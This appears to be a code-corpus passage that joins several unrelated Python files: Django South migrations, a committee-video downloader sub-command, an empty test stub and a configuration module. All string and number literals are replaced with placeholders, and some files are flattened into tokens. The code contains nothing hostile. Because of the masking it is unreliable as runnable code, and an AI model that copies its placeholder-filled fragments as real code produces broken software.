            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:0>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:0>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:0>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:0>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:blank>': '<STR_LIT:True>', '<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:email>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:1>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:True>', '<STR_LIT>': '<STR_LIT:True>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT>': "<STR_LIT>", '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:user>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>", '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT:date>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>"})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT:title>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:url>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT>': '<STR_LIT:True>'})
        }
    }

    complete_apps = ['<STR_LIT>']
    # NOTE(review): leftover attribute from South's M2M migration template;
    # appears to be harmless for a DataMigration -- confirm before removing.
    symmetrical = True
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):
    # South schema migration: adds one CharField-style column (forwards)
    # and drops it again (backwards).

    def forwards(self, orm):
        # keep_default=False: the default is only used to fill existing rows
        # during the migration, not kept on the column afterwards.
        db.add_column('<STR_LIT>', '<STR_LIT>', self.gf('<STR_LIT>')(default='<STR_LIT>', max_length=<NUM_LIT:200>, blank=True), keep_default=False)

    def backwards(self, orm):
        # Exact reverse of forwards(): drop the added column.
        db.delete_column('<STR_LIT>', '<STR_LIT>')

    # Frozen ORM state auto-generated by South: each field is a
    # (field class path, positional args, keyword args) triple.
    # Do not edit by hand.
    models = {
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': "<STR_LIT>", '<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'})
        }
    }

    complete_apps = ['<STR_LIT>']
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):
    # South schema migration: adds one nullable column (forwards) and drops
    # it again (backwards).

    def forwards(self, orm):
        # Nullable + blank, so no default value is needed for existing rows.
        db.add_column('<STR_LIT>', '<STR_LIT>',
                      self.gf('<STR_LIT>')(max_length=<NUM_LIT:200>, null=True, blank=True),
                      keep_default=False)

    def backwards(self, orm):
        # Exact reverse of forwards(): drop the added column.
        db.delete_column('<STR_LIT>', '<STR_LIT>')

    # Frozen ORM state auto-generated by South: each field is a
    # (field class path, positional args, keyword args) triple.
    # Do not edit by hand.
    models = {
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:max_length>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT:blank>': '<STR_LIT:True>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>'}),
            '<STR_LIT:email>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:False>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:password>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:to>': "<STR_LIT>", '<STR_LIT>': '<STR_LIT:False>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:username>': ('<STR_LIT>', [], {'<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:max_length>': '<STR_LIT>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT>': "<STR_LIT>", '<STR_LIT>': "<STR_LIT>", '<STR_LIT:object_name>': '<STR_LIT>', '<STR_LIT>': "<STR_LIT>"},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT:100>'})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT:action>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT:name>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'}),
            '<STR_LIT:value>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:blank>': '<STR_LIT:True>', '<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:to>': "<STR_LIT>"})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT:action>': ('<STR_LIT>', [], {}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:blank>': '<STR_LIT:True>', '<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:to>': "<STR_LIT>"})
        },
        '<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>', '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:blank>': '<STR_LIT:True>', '<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:null>': '<STR_LIT:True>', '<STR_LIT:to>': "<STR_LIT>"}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT:0>', '<STR_LIT>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:default>': '<STR_LIT>', '<STR_LIT>': '<STR_LIT:True>', '<STR_LIT:blank>': '<STR_LIT:True>'}),
            '<STR_LIT>': ('<STR_LIT>', [], {'<STR_LIT:related_name>': "<STR_LIT>", '<STR_LIT:to>': "<STR_LIT>"})
        }
    }

    complete_apps = ['<STR_LIT>']
import os, sys, traceback
from video.management.commands.sub_commands import SubCommand
from django.contrib.contenttypes.models import ContentType
from committees.models import Committee
from video.models import Video
from video.utils import get_videos_queryset


class DownloadCommitteesVideos(SubCommand):
    """Sub-command that downloads committee videos over MMS.

    NOTE: all of the work happens in __init__ -- constructing the object
    runs the whole download pass (existing design, kept as-is).
    """

    def __init__(self, command, mms=None, mb_quota=None):
        # ``mms`` is injectable for testing; falls back to the real module.
        if mms is None: import video.utils.mms as mms
        SubCommand.__init__(self, command)
        self._verifyDataDir()
        videos = self._getVideosToDownload()
        self._debug('<STR_LIT>' + str(len(videos)) + '<STR_LIT>')
        total_bytes = <NUM_LIT:0>
        for video in videos:
            # Stop once the cumulative byte count exceeds the quota
            # (presumably converted to megabytes here -- TODO confirm the
            # divisor's value, it is elided in this view).
            if mb_quota is not None and (total_bytes / <NUM_LIT>) > mb_quota:
                self._warn('<STR_LIT>' + str(mb_quota) + '<STR_LIT>')
                break
            self._check_timer()
            url = video.embed_link
            self._debug('<STR_LIT>' + url)
            filename = self._get_data_root() + '<STR_LIT>' + self._getFilenameFromUrl(url)
            if self._isAlreadyDownloaded(filename):
                # Already complete: just count its size towards the quota.
                self._debug("<STR_LIT>" + filename)
                total_bytes = total_bytes + self._getFileSize(filename)
                continue
            else:
                # In-progress downloads are written to a separate part file
                # and renamed only once complete.
                partfilename = filename + '<STR_LIT>'
                try:
                    streamsize = mms.get_size(url)
                except Exception, e:
                    # Size probe failed: log and move on to the next video.
                    self._warn('<STR_LIT>' + str(e))
                    traceback.print_exc(file=sys.stdout)
                else:
                    self._debug('<STR_LIT>' + str(streamsize))
                    mins_remaining = round(self._timer_remaining() / <NUM_LIT>)
                    downloaded = False
                    # NOTE(review): the source has no indentation; this
                    # ``else`` is taken to pair with the part-file existence
                    # check (resume a partial file, otherwise start fresh) --
                    # confirm against the original layout.
                    if self._isAlreadyDownloaded(partfilename):
                        filesize = self._getFileSize(partfilename)
                        if filesize < streamsize:
                            self._debug('<STR_LIT>')
                            try:
                                isDownloadDone = mms.resume_download(url, partfilename, mins_remaining)
                                downloaded = True
                            except Exception, e:
                                self._warn('<STR_LIT>' + str(e))
                                traceback.print_exc(file=sys.stdout)
                    else:
                        self._debug('<STR_LIT>')
                        try:
                            isDownloadDone = mms.download(url, partfilename, mins_remaining)
                            downloaded = True
                        except Exception, e:
                            self._warn('<STR_LIT>' + str(e))
                            traceback.print_exc(file=sys.stdout)
                    if downloaded:
                        self._check_timer()
                        filesize = self._getDownloadedFileSize(partfilename)
                        self._debug('<STR_LIT>' + str(filesize))
                        if isDownloadDone:
                            # Fully downloaded: promote part file to its
                            # final name.
                            self._renameFile(partfilename, filename)
                            self._debug("<STR_LIT>" + filename)
                        # Partial downloads also count towards the quota.
                        total_bytes = total_bytes + filesize

    def _verifyDataDir(self):
        # Ensure the download directory under the data root exists.
        if not os.path.exists(self._get_data_root() + '<STR_LIT>'):
            os.makedirs(self._get_data_root() + '<STR_LIT>')

    def _getFilenameFromUrl(self, url):
        # Last path component of the URL.
        filename = url.split('<STR_LIT:/>')
        filename = filename[len(filename) - <NUM_LIT:1>]
        return filename

    def _getVideosToDownload(self):
        # Committee videos in the given group that do not yet have a
        # corresponding entry per get_videos_queryset.
        ret = []
        object_type = ContentType.objects.get_for_model(Committee)
        videos = Video.objects.filter(content_type__pk=object_type.id, group='<STR_LIT>').order_by('<STR_LIT:id>')
        for video in videos:
            qs = get_videos_queryset(video, group='<STR_LIT>', ignoreHide=True)
            if qs.count() == <NUM_LIT:0>:
                ret.append(video)
        return ret

    def _isAlreadyDownloaded(self, filename):
        # A file on disk counts as downloaded (possibly partially, for
        # part files).
        return os.path.exists(filename)

    def _getFileSize(self, filename):
        return os.path.getsize(filename)

    def _getDownloadedFileSize(self, filename):
        # Thin alias kept for readability at the call site.
        return self._getFileSize(filename)

    def _renameFile(self, filename, newfilename):
        os.rename(filename, newfilename)
<s> from django . test import TestCase <EOL> class testMms ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def testGetSize ( self ) : <EOL> pass <EOL> def testDownload ( self ) : <EOL> pass <EOL> def testResumeDownload ( self ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from . import errors <EOL> from . import newconfig <EOL> from . import rcontrol_all <EOL> from . import util <EOL> from . import vc <EOL> from . util import json <EOL> import codecs <EOL> import imp <EOL> import os <EOL> import re <EOL> import shutil <EOL> import sys <EOL> NODE_CONF_FILE = "<STR_LIT>" <EOL> SYSTEM_CONF_FILE = "<STR_LIT>" <EOL> CONFIG_CONF_FILE = "<STR_LIT>" <EOL> REPO_CONF_FILE = "<STR_LIT>" <EOL> CONFIG_DIR = "<STR_LIT>" <EOL> PLUGIN_FILE = "<STR_LIT>" <EOL> SETTINGS_DIR = "<STR_LIT>" <EOL> DONT_SHOW = set ( [ "<STR_LIT>" ] ) <EOL> DONT_SAVE = set ( [ "<STR_LIT:index>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> g_plugin_module_cache = { } <EOL> g_plugin_cache = { } <EOL> g_cache_reset_counter = <NUM_LIT:0> <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> string_types = basestring <EOL> else : <EOL> string_types = str <EOL> def ensure_dir ( typename , root , name , must_exist ) : <EOL> """<STR_LIT>""" <EOL> target_dir = os . path . join ( root , name ) <EOL> exists = os . path . exists ( target_dir ) <EOL> if ( not must_exist ) and exists : <EOL> raise errors . UserError ( "<STR_LIT>" % ( typename , name ) ) <EOL> elif must_exist and ( not exists ) : <EOL> raise errors . UserError ( "<STR_LIT>" % ( typename , name ) ) <EOL> return target_dir <EOL> class ConfigMatch ( object ) : <EOL> def __init__ ( self , pattern , full_match = False ) : <EOL> if "<STR_LIT:$>" in pattern [ : - <NUM_LIT:1> ] : <EOL> raise errors . UserError ( "<STR_LIT>" % pattern ) <EOL> pattern = pattern . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> parts = pattern . rsplit ( "<STR_LIT:/>" , <NUM_LIT:1> ) <EOL> if len ( parts ) == <NUM_LIT:2> : <EOL> node_pattern , config_pattern = parts <EOL> else : <EOL> node_pattern = "<STR_LIT:.>" <EOL> config_pattern = parts [ <NUM_LIT:0> ] <EOL> if full_match : <EOL> if not config_pattern . endswith ( "<STR_LIT:$>" ) : <EOL> config_pattern += "<STR_LIT:$>" <EOL> self . match_config = re . 
compile ( config_pattern ) . match <EOL> if not node_pattern . endswith ( "<STR_LIT:$>" ) : <EOL> node_pattern += "<STR_LIT:$>" <EOL> self . match_node = re . compile ( node_pattern ) . match <EOL> else : <EOL> self . match_config = re . compile ( config_pattern ) . search <EOL> self . match_node = re . compile ( node_pattern ) . search <EOL> def matches ( self , node , conf ) : <EOL> if not self . match_node ( node . name ) : <EOL> return False <EOL> return self . match_config ( conf . name ) <EOL> class Item ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , typename , system , name , item_dir , conf_file , extra ) : <EOL> dict . __init__ ( self ) <EOL> assert isinstance ( system , ( System , type ( None ) ) ) <EOL> assert isinstance ( typename , string_types ) <EOL> assert isinstance ( name , string_types ) <EOL> assert isinstance ( item_dir , string_types ) <EOL> assert isinstance ( extra , ( dict , type ( None ) ) ) <EOL> self . type = typename <EOL> self . system = system <EOL> self . name = name <EOL> self . path = PathPyCompat ( item_dir ) <EOL> self . conf_file = conf_file <EOL> self . update ( extra or { } ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . name ) <EOL> def __eq__ ( self , other ) : <EOL> return self . name == other . name <EOL> def get_full_path ( self ) : <EOL> return self . name <EOL> full_path = property ( get_full_path , doc = "<STR_LIT>" ) <EOL> def showable ( self ) : <EOL> """<STR_LIT>""" <EOL> for k , v in sorted ( self . items ( ) ) : <EOL> if k not in DONT_SHOW : <EOL> yield k , v <EOL> def set_properties ( self , props ) : <EOL> """<STR_LIT>""" <EOL> changes = [ ] <EOL> for key_str , value in props . items ( ) : <EOL> old_value = util . set_dict_prop ( self , key_str . split ( "<STR_LIT:.>" ) , value ) <EOL> changes . append ( ( key_str , old_value , value ) ) <EOL> return changes <EOL> def log_update ( self , updates ) : <EOL> """<STR_LIT>""" <EOL> changes = [ ] <EOL> for key , value in updates . 
items ( ) : <EOL> old = self . get ( key ) <EOL> if old != value : <EOL> self [ key ] = value <EOL> changes . append ( ( key , old , value ) ) <EOL> return changes <EOL> def saveable ( self ) : <EOL> """<STR_LIT>""" <EOL> for k , v in sorted ( self . items ( ) ) : <EOL> if k not in DONT_SAVE : <EOL> yield k , v <EOL> def verify_enabled ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . get_tree_property ( "<STR_LIT>" , True ) <EOL> and not self . get_tree_property ( "<STR_LIT>" , False ) ) <EOL> def get_tree_property ( self , name , default = None ) : <EOL> """<STR_LIT>""" <EOL> value = self . get ( name ) <EOL> if value is not None : <EOL> return value <EOL> if self . system : <EOL> return self . system . get_tree_property ( name , default = default ) <EOL> return default <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT:U+002CU+0020>" . join ( ( "<STR_LIT>" % item ) for item in self . showable ( ) ) <EOL> def save ( self ) : <EOL> """<STR_LIT>""" <EOL> util . json_dump ( dict ( self . saveable ( ) ) , self . conf_file ) <EOL> def cleanup ( self ) : <EOL> pass <EOL> class Config ( Item ) : <EOL> def __init__ ( self , node , name , config_dir , extra = None ) : <EOL> Item . __init__ ( self , "<STR_LIT>" , None , name , config_dir , <EOL> os . path . join ( config_dir , CONFIG_CONF_FILE ) , <EOL> extra ) <EOL> self . update ( json . load ( open ( self . conf_file ) ) ) <EOL> self . node = node <EOL> self . settings_dir = os . path . join ( self . path , SETTINGS_DIR ) <EOL> self . settings = newconfig . Config ( self . get_settings_dirs ( ) ) <EOL> self . controls = None <EOL> self . plugin = None <EOL> def get_full_path ( self ) : <EOL> return "<STR_LIT>" % ( self . node . name , self . name ) <EOL> 